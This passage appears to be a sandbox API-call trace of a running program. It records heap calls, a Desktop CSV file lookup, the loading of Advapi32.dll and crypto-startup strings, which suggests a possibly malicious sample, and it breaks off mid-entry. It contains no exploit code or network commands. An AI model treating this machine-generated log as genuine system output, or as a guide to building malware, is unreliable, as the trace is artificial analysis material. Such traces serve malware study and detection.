HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0132.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0132.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0132.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0132.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0132.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0132.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0132.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0132.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0132.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0132.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0132.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0132.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0132.870] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/5_pKd716n7PnD.csv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7cf2440, ftCreationTime.dwHighDateTime=0x1d5e0f3, ftLastAccessTime.dwLowDateTime=0x1551fec0, ftLastAccessTime.dwHighDateTime=0x1d5e1d0, ftLastWriteTime.dwLowDateTime=0x1551fec0, ftLastWriteTime.dwHighDateTime=0x1d5e1d0, nFileSizeHigh=0x0, nFileSizeLow=0x13fbd, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="5_pKd716n7PnD.csv", cAlternateFileName="5_PKD7~1.CSV")) returned 0xa870d0 [0132.870] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0132.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0132.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0132.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0132.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0132.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0132.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0132.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0132.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0132.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0132.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0132.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0132.872] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0132.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0132.872] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0132.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0132.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0132.872] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0132.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0132.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0132.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0132.872] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0132.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0132.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0132.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0132.873] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0132.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0132.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0132.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0132.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0132.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0133.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0133.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0133.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0133.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0133.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0133.000] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0133.000] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0133.000] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0133.000] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0133.000] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0133.001] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0133.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0133.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0133.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0133.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0133.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.002] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.002] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0133.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0133.003] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0133.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0133.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0133.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0133.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0133.003] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0133.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0133.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.004] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0133.004] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0133.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0133.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0133.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0133.005] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0133.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0133.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.006] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 